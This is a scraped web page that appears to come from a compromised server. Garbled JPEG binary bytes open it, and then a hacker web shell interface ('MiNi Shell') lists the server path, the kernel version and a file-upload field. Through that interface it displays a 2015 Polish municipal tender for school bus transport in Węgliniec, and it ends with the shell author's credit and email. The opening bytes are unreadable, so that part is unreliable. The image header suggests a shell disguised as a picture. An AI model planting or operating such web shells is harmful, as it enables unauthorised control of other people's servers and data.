JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150617/146416-N-2015.html

<p class="kh_header"><b>Węgliniec: Dowóz uczniów do Zespołów Szkół na terenie gminy Węgliniec w latach 2015-2017</b><br>
<b>Numer ogłoszenia: 146416 - 2015; data zamieszczenia: 17.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Węgliniec , ul. Sikorskiego 3, 59-940 Węgliniec, woj. dolnośląskie, tel. 075 77 11 435, faks 075 77 12 551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wegliniec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do Zespołów Szkół na terenie gminy Węgliniec w latach 2015-2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia jest dowóz i odwóz uczniów do Zespołów Szkół na terenie gminy Węgliniec przy użyciu autobusów i busów szkolnych wraz z zapewnieniem opieki w czasie przejazdów znak sprawy: PR.271.9.2015.ZP. 
2.	Opis przedmiotu zamówienia: 
2.1	ZADANIE NR 1 - Dowóz uczniów do Zespołu Szkół w Węglińcu
2.1.1	Liczba uczniów dojeżdżających do Szkoły Podstawowej i Gimnazjum w Węglińcu

Dojazd do Węglińca	Rok szkolny 2015/2016	Rok szkolny 2016/2017
	Gimnazjum	Szkoła Podstawowa	Gimnazjum	Szkoła Podstawowa
Zielonka	8	31	7	32
Stary Węgliniec	16	28	19	35
Czerwona Woda	47	4	46	4
Razem	71	63	72	71


2.1.2	Trasy dowozu przedstawia poniższy plan kursów 

Nr kursu	Trasa	Dzień tygodnia	Ilość km
1	Węgliniec - Zielonka Gajówka - Węgliniec 	poniedziałek-piątek	21
2	Węgliniec - Stary Węgliniec pod dębem - Węgliniec	poniedziałek-piątek	14
3	Węgliniec - Stary Węgliniec świetlica - Węgliniec	poniedziałek-piątek	9
4	Węgliniec - Czerwona Woda ul. Kuźniczyska - Węgliniec	poniedziałek-piątek	12
5	Węgliniec - Czerwona Woda - Węgliniec	poniedziałek-piątek	14
6	Węgliniec - Czerwona Woda BZMO - ul. Kuźniczyska - Schronisko - ul. Kościelnik 1 - Węgliniec	poniedziałek-piątek	24
7	Węgliniec - Stary Węgliniec pod dębem - Zielonka Gajówka -Węgliniec	poniedziałek-piątek	28
8	Węgliniec - Stary Węgliniec  pod dębem -Zielonka -Węgliniec	poniedziałek-piątek	28
9	Węgliniec - Stary Węgliniec  pod dębem -Zielonka -Wegliniec	poniedziałek-piątek	28
10	Węgliniec - Czerwona Woda BZMO - ul. Kuźniczyska- Węgliniec	poniedziałek-piątek	9
11	Węgliniec - szkoła Czerwona Woda - Węgliniec	poniedziałek-piątek	12
12	Węgliniec - Czerwona Woda BZMO - ul. Kuźniczyska - Schronisko - ul. Kościelnik 1 - Węgliniec	poniedziałek-piątek	24
Razem	223

2.1.3. Przystanki szkolne:
-Węgliniec - ul. Partyzantów przy bramie szkolnej
-Zielonka
przystanek szkolny
Gajówka
-Czerwona Woda :
        ul. Kolejowa (koło Szkoły Podstawowej w Czerwonej Wodzie)
        ul.3-go maja 40 w Czerwonej Wodzie 9 koło kopalni BZMO
        ul.3-go Maja 1 (przy skrzyżowaniu z ul. Zgorzelecką)
        ul. Lubańska - przystanek główny PKS (przy skrzyżowaniu ul. Lubańskiej z ul. Zgorzelecką)
        ul. Kuźniczyska ( przy schronisku)
        ul. Kościelnik 1
        ul. Kuźniczyska (przy Ośrodku Jagoda)
      -Stary Węgliniec
ul. Główna (przystanek PKS na żądanie)
ul. Konopnickiej (koło świetlicy wiejskiej)
ul. Główna (przystanek PKS za żądanie, tzw. pod dębem)

2.2	ZADANIE NR 2 - Dowóz uczniów do Zespołu Szkół w Ruszowie 
2.2.1.	Liczba uczniów dojeżdżających do Szkoły Podstawowej i Gimnazjum w Ruszowie 

Dojazd do Ruszowa	Rok szkolny 2015/2016	Rok szkolny 2016/2017
	Gimnazjum	Szkoła Podstawowa	Gimnazjum	Szkoła Podstawowa
Jagodzin	15	31	14	28
Piaseczna	13	11	12	9
Polana	0	7	1	8
Kościelna Wieś	8	20	5	24
Stary Węgliniec	5	1	4	1
Gozdnica	10	19	8	15
Razem	51	89	44	85


2.2.2.	Trasy dowozu przedstawia poniższy tygodniowy plan kursów

Nr kursu	Trasa	Dzień tygodnia	Ilość km
1	Stary Węgliniec - Piaseczna - Jagodzin-Ruszów	poniedziałek-piątek	24
2	Piaseczna- Jagodzin-Ruszów 	poniedziałek-piątek	18
3	Ruszów -Gozdnica -Polana - Jagodzin - Ruszów 	poniedziałek-piątek	 28
4	Szklarka - Kościelna Wieś - Ruszów 	poniedziałek-piątek	12
5	Ruszów - Jagodzin - Piaseczna  	poniedziałek-piątek	16
6	Ruszów - Jagodzin - Piaseczna	poniedziałek-piątek	17,5
7	Ruszów - Stary Węgliniec	poniedziałek-piątek	12
8	Ruszów - Kościelna Wieś - Szklarka	poniedziałek-piątek	12
9	Ruszów - Kościelna Wieś 	poniedziałek-piątek	12
10	Ruszów - Gozdnica -Polana-Ruszów 	poniedziałek-piątek	26
Razem	177,5

2.2.3.	Przystanki szkolne
-Ruszów
ul. Zgorzelecka - przy bramie szkoły
ul. Zgorzelecka przy przejeździe kolejowym
      - Piaseczna
Droga 296 - koło sklepu
Przystanek PKS
Przystanek na końcu Piasecznej w stronę Starego Węglińca
Przystanek koło transformatora
Przystanek Stary Węgliniec 
- Jagodzin
Przystanek PKS
Przystanek koło przejazdu kolejowego na Ruszów
-Polana
-Gozdnica przy SP 
-Gozdnica przy Gimnazjum 
-Szklarka
-Kościelna Wieś
Przystanek koło rzeki
Przystanek koło sklepu



3.	Dowóz uczniów odbywać się będzie od poniedziałku do piątku każdego tygodnia, w dni nauki szkolnej, w oparciu o rozporządzenie Ministra Edukacji Narodowej i Sportu z 18 kwietnia 2010r. (Dz. U. Nr 46, poz. 432 z późn. zm.), w okresie od 01 września 2015r. do 30 czerwca 2017r. z wyłączeniem przerw świątecznych, ferii zimowych i letnich oraz innych dni wolnych od zajęć. 
4.	Dowóz i odwóz uczniów odbywał się będzie według rozkładu opisanego w powyższych tabelach. Ilość kursów, rodzaj środka transportu oraz ilość kilometrów jak również rozkład jazdy może ulec korekcie  po sporządzeniu planu lekcji w poszczególnych placówkach oświatowych. Wykonawca otrzyma szczegółowe godziny dowozu i odwozu uczniów wraz z wykazem kursów, rodzajem środka transportu oraz z ilością kilometrów po sporządzeniu planu lekcji w poszczególnych placówkach oświatowych.
5.	Środki transportu muszą być oznakowane, zgodnie z odrębnymi przepisami, tablicą informującą, iż przewożone są dzieci oraz muszą posiadać ubezpieczenie OC i NW i aktualne badania techniczne dopuszczające pojazd do ruchu
6.	Niedopuszczalne jest aby jechała większa liczba dzieci niż jest miejsc przeznaczonych dla pasażerów (według dowodu rejestracyjnego pojazdu)
7.	Wykonawca odpowiada za bezpieczeństwo uczniów w czasie wsiadania i wysiadania i podczas jazdy.
8.	Wykonawca zapewnia opiekuna w zakresie zapewnienia bezpieczeństwa uczniów w trakcie wsiadania, wysiadania i przewozu. 
9.	Kierowca rozpoczyna jazdę  po uzyskaniu zgody opiekuna uczniów. 
10.	Kierowca prowadzący pojazd musi wykazywać się odpornością psychiczną na nietypowe, często głośne zachowania dzieci oraz prowadzić pojazd w sposób łagodny.
11.	Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna, spowodowana działalnością Wykonawcy.
12.	Wykonawca gwarantuje, iż w sytuacjach awaryjnych na własny koszt zabezpieczy zastępczy środek transportu, w sposób zapewniający dowóz i odwóz uczniów do szkół oraz opiekę nad tymi uczniami. Wykonawca opisze sposób realizacji zamówienia w sytuacjach awaryjnych.
13.	W przypadku nie wywiązania się przez Wykonawcę z sytuacji awaryjnej Zamawiający zapewni środki transportu na koszt Wykonawcy. 
14.	Zamawiający dopuszcza składanie ofert częściowych, przy czym częścią zamówienia jest realizacja jednego zadania.
15.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych
16.	Zamawiający nie zamierza zawierać umowy ramowej.
17.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
18.	Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych do 50% wartości zamówienia podstawowego. Zakres zamówień uzupełniających może objąć:
a)	realizację przewozów w dniach nauki szkolnej (udział uczniów w olimpiadach, konkursach przedmiotowych, udział w zawodach sportowych, udział w kołach pozalekcyjnych, itp.). 
b)	realizację przewozów w  innych niż dni nauki szkolnej (rekolekcje, odpracowywanie nauki w innych terminach, święta szkolne, święta gminne, przewozy uczniów na imprezy organizowane przez zamawiającego, itp.)
c) realizację dowozów polegających na powtórzeniu tego samego rodzaju zamówienia
19.	Powyższe przewozy uzupełniające powinny być uzgodnione z Zamawiającym telefonicznie lub na piśmie, na co najmniej dwa dni przed wyjazdem.
20.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
21.	Ustala się następujące warunki płatności.
21.1.Wartość umowy nie może zostać podwyższona w drodze aneksu  do niniejszej Umowy. Wartość całkowita przedmiotu umowy nie będzie waloryzowana w okresie realizacji umowy
21.2. Faktura powinna być  adresowana do: Gmina Węgliniec, ul. Sikorskiego 3, 59-940 Węgliniec. NIP - 615-18-08-660.
21.3. Rozliczenie usług następować będzie miesięcznymi fakturami VAT na podstawie miesięcznego zestawienia do faktury.
21.4. Podstawą do wystawienia faktury VAT jest zestawienie zatwierdzone przez Dyrektora właściwej szkoły . 
21.5. Płatność za fakturę VAT będzie dokonywana miesięcznie przelewem z konta Zamawiającego na konto Wykonawcy w terminie 30 dni od daty dostarczenia faktury VAT do siedziby Zamawiającego.
22. KOD CPV - 60100000 - 9 usługi w zakresie transportu drogowego 
22.	Wykonawca może powierzyć podwykonawcom wykonanie części zamówienia. W takim przypadku wykonawca jest zobowiązany wskazać w załączniku nr 4 do niniejszej specyfikacji części zamówienia, które powierzy podwykonawcom. 
23.	 Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych do 50% wartości zamówienia podstawowego. Zakres zamówień uzupełniających może objąć:
a)	realizację przewozów w dniach nauki szkolnej (udział uczniów w olimpiadach, konkursach przedmiotowych, udział w zawodach sportowych, udział w kołach pozalekcyjnych, itp.). 
b)	realizację przewozów w  innych niż dni nauki szkolnej (rekolekcje, odpracowywanie nauki w innych terminach, święta szkolne, święta gminne, przewozy uczniów na imprezy organizowane przez zamawiającego, itp.)
c) realizację dowozów polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić koncesję, zezwolenie lub licencję na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym - DOTYCZY ZADANIA NR 1 I ZADANIA NR 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem zawodowym w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonaniem, co najmniej jednej usługi polegającej na dowozie uczniów do szkół, przy czym wartość tej usługi nie może być mniejsza niż 100.000,00 zł (brutto).DOTYCZY ZADANIA NR 1 I ZADANIA NR 2
Za wykonane zamówienie Zamawiający rozumie takie, w którym przedmiot umowy został wykonany należycie.
W przypadku oferty składanej wspólnie przez kilku Wykonawców, co najmniej jeden z Wykonawców musi spełniać warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje :
1.3.1 ZADANIE NR 1
a) co najmniej 1 autobusem o minimum 39 miejsc dla pasażerów
b) co najmniej jednym autobusem o minimum 50 miejsc dla pasażerów
c) co najmniej jednym busem o minimum 25 miejsc dla pasażerów
1.3.2. ZADANIE NR 2 
a) co najmniej 1 autobusem o minimum 39 miejsc dla pasażerów 
b) co najmniej jednym autobusem o minimum 50 miejsc dla pasażerów 
c) co najmniej jednym busem o minimum 18 miejsc dla pasażerów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać , iż dysponuje 
1.4.1.ZADANIE NR 1;
a)co najmniej 3 kierowcami  z kwalifikacjami wymaganymi przepisami ustawy z dnia 6 września 2001r. o transporcie drogowym (tj. Dz.U. z 2015r.poz. 390)
b)co najmniej dwoma osobami z kwalifikacjami do sprawowania opieki nad uczniami podczas dojazdu do i ze szkoły (podczas wsiadania, wysiadania i podczas jazdy autobusem)
1.4.2.ZADANIE NR 2 :
a)co najmniej 3 kierowcami z kwalifikacjami wymaganymi przepisami ustawy z dnia 6 września 2001r. o transporcie drogowym (tj. Dz.U. z 2015r. , poz. 390)
b)co najmniej dwoma osobami z kwalifikacjami do sprawowania opieki nad uczniami podczas dojazdu do i ze szkoły (podczas wsiadania, wysiadania i podczas jazdy autobusem)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY NIE WYZNACZA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Czas podstawienia autobusu zastępczego w razie awarii - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień ust. 2.
2.	Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące :
2.1.terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności:

a)	działania siły wyższej
b)	z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego
13.2	wzrostu/obniżenia maksymalnego wynagrodzenia Wykonawcy określonego w § 6 ust. 2 w  szczególnie uzasadnionych przypadkach. 
13.3	Zmiany zakresu przedmiotu zamówienia w przypadku 
a)	uzasadnionej zmiany długości tras
b)	uzasadnionej zmiany przebiegu trasy
c)	uzasadnionej zmiany ilości i miejsc przystanków 

3.	Termin powiadomienia o konieczności wprowadzenia zmian w zawartej umowie nie może nastąpić później niż 3 dni od zaistnienia okoliczności uzasadniających zmiany w umowie.
4.	Wszelkie zmiany i uzupełnienia treści umowy muszą mieć formę pisemną pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wegliniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta
ul. Sikorskiego 3
59 - 940 Węgliniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2015 godzina 12:00, miejsce: Urząd Gminy i Miasta
ul. Sikorskiego 3
59 - 940 Węgliniec
Sekretariat - pokój nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com